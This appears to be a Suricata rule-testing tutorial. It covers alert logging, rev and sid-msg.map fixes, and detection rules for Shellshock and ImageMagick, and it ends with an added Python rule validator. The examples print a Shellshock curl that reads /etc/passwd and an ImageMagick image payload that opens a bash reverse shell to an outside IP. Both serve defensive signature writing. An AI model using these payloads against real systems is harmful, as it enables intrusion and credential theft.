[suricata] Rule testing

Rule testing
Add a rule:
alert icmp any any -> any any (msg:"icmp"; sid:1;)
Note: the option list must end with a ';', otherwise the rule does not take effect.
6/14-18:03:36.748615  [**] [1:1:0] snort general alert [**] [Classification ID: 0] [Priority ID: 3] {ICMP} 172.16.100.1 -> 172.16.100.160
INFO: Current event with event_id [13] Event Second:Microsecond [1465898616:748615] and signature id of [1] was logged with a revision of [0]
      Make sure you verify your triggering  rule body so it include the snort keyword "rev:xxx;" Where xxx is greater than 0 
>>>>>>The event has not been logged to the database<<<<<<
Modify the rule:
alert icmp any any -> any any (msg:"icmp"; sid:1000000;rev:1;)
Kill the process and restart.
Now it works: the revision number rev must be added.
06/14-19:01:56.924150  [**] [1:1000000:1] Snort Alert [1:1000000:1] [**] [Classification ID: 0] [Priority ID: 3] {ICMP} 172.16.100.160 -> 172.16.100.1
06/14-19:01:57.927259  [**] [1:1000000:1] Snort Alert [1:1000000:1] [**] [Classification ID: 0] [Priority ID: 3] {ICMP} 172.16.100.1 -> 172.16.100.160
However, the msg text is still not shown. The msg in the rule is only a label; the alert message is looked up by sid in sid-msg.map. So we edit /etc/suricata/rules/sid-msg.map, add the line 1000000 || icmp, and then restart barnyard2.

Examples:
1) Bash vulnerability

curl -A '() { :; }; /bin/cat /etc/passwd' http://172.16.100.160:3000/cgi-bin/poc.cgi
The keyword to detect is () {
Here we write it in hexadecimal.
Add a rule:
alert http any any -> any any (msg:"Bash RCE";flow:established,to_server; content:"|28 29 20 7b|"; http_header; classtype:BashRCE; sid:1000002; rev:1;)

2) ImageMagick vulnerability
The content of the uploaded image is:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/106.187.4.9/2345 0>&1")'
pop graphic-context
Then we create a new rule:
alert http any any -> any any (msg:"ImageMagick RCE";flow:established,to_server; content:"url(https|3A|//"; http_client_body; classtype:vinc; sid:1000002; rev:1;)
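The two pitfalls from the ICMP test above (an option list that does not end in ';', and a missing rev that makes barnyard2 refuse to log the event) and the sid-msg.map lookup can be checked before a rule is loaded. The following is an added example, not code from the post or from Suricata: a small rule-option parser that validates the sample rules from this post and emits the matching sid-msg.map lines. The sample rule list is constructed from the rules shown above; the function names are my own.

```python
import re

# Constructed sample: the rules tested in this post (the first one lacks rev)
RULES = [
    'alert icmp any any -> any any (msg:"icmp"; sid:1;)',
    'alert icmp any any -> any any (msg:"icmp"; sid:1000000;rev:1;)',
    'alert http any any -> any any (msg:"Bash RCE";flow:established,to_server; '
    'content:"|28 29 20 7b|"; http_header; classtype:BashRCE; sid:1000002; rev:1;)',
]

# One option: name, optional ":value" (quoted or bare), then the mandatory ';'
OPTION_RE = re.compile(r'\s*([a-z_]+)\s*(?::\s*("(?:[^"\\]|\\.)*"|[^;]*))?;')

def parse_rule(rule):
    """Return (header, {option: value}); reject a body whose last option lacks ';'."""
    if not re.search(r';\s*\)\s*$', rule):
        raise ValueError("last option must end with ';' (rule would not load)")
    header, _, body = rule.partition('(')   # the header itself contains no '('
    body = body.rstrip()[:-1].strip()       # drop the closing ')'
    opts, pos = {}, 0
    while pos < len(body):
        m = OPTION_RE.match(body, pos)
        if not m:
            raise ValueError(f"cannot parse option at {body[pos:]!r}")
        name, val = m.group(1), m.group(2)
        if val is not None and val.startswith('"'):
            val = val[1:-1]                 # unquote msg/content values
        opts[name] = val
        pos = m.end()
    return header.strip(), opts

def check_rule(rule):
    """Return (sid, rev, msg); rev must be >= 1 or barnyard2 will not log the event."""
    _, opts = parse_rule(rule)
    sid = int(opts['sid'])
    rev = int(opts.get('rev') or 0)
    if rev < 1:
        raise ValueError(f"sid {sid}: rev missing, event would not be logged")
    return sid, rev, opts.get('msg') or ''

def sid_msg_map(rules):
    """Build the 'sid || msg' lines for sid-msg.map, skipping rules that fail the checks."""
    lines = []
    for rule in rules:
        try:
            sid, _, msg = check_rule(rule)
        except ValueError:
            continue
        lines.append(f"{sid} || {msg}")
    return lines
```

Running sid_msg_map(RULES) yields the line 1000000 || icmp that the post adds by hand, plus 1000002 || Bash RCE; the rev-less sid:1 rule is dropped.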